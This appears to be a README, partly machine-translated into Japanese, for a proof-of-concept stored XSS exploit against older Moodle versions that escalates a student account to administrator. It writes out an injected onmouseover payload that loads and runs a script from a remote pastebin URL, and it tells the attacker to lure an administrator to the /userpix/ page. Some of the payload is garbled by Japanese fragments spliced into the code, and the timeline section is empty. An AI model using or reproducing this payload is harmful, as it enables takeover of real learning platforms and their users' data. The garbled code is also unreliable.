
Moodle (< 3.6.2, < 3.5.4, < 3.4.7, < 3.1.16) 権限昇格(学生から管理者)のためのXSS PoC
Moodle (< 3.6.2, < 3.5.4, < 3.4.7, < 3.1.16) XSS PoC for Privilege Escalation (Student to Admin). これは、私が過去に学術機関でのペネトレーションテスト中に発見したバグの一つです。当時、この単純なバグ一つで実質的に管理者アクセスを盗み、Moodleを完全に制御することができました。
git historyからわかるように、このバグはMoodleの旧バージョン(2003年)から存在し、2019年に修正されました。
タイムライン:
教育目的のみ。違法行為にこのエクスプロイトを使用しないでください。作者は誤用や損害に対する責任を負いません。
useridの値を自分のIDに変更します。URLがhttps://pastebin.com/raw/xxxxxxxxだとします。" style="position:fixed;height:100%;width:100%;top:0;left:0" onmouseover="x=document.createElementに設定します。('script');x.src='https://pastebin.com/raw/xxxxxxxx';document.body.appendChild(x); alert('XSS')に設定します。/userpix/ページを開くように依頼するか、自分の投稿にそのページへのリンクを貼り、待ちます。成功すると、あなたのアカウントが管理者として追加されます。